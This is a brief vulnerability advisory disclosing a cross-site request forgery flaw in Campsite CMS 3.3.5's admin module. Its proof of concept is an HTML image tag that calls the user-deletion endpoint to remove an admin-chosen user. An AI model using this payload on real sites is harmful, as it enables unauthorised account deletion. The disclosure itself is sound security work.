Campsite version 3.3.5 suffers from a cross site request forgery vulnerability.
eb0d01c2a930fc31d717fa16a939f6a78c269961cbbb5fd5db5f784cfc57e10a =======================================================================
campsite 3.3.5 CSRF Vulnerability
=======================================================================
by
Pratul Agrawal
# Vulnerability found in- Admin module
# email Pratulag@yahoo.com
# company aksitservices
# Credit by Pratul Agrawal
# Category CMS / Portals
# Site p4ge http://campsite-demo.campware.org/admin/login.php
# Plateform php
# Proof of concept #
Targeted URL: http://campsite-demo.campware.org/admin/login.php
Script to delete the Admin user through Cross Site request forgery
. ..................................................................................................................
<html>
<body>
<img src=http://campsite-demo.campware.org/admin/users/do_del.php?User=[userID]&uType=Staff />
</body>
</html>
. ..................................................................................................................
After execution refresh the page and u can see that user having giving ID get deleted automatically.
#If you have any questions, comments, or concerns, feel free to contact me.
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed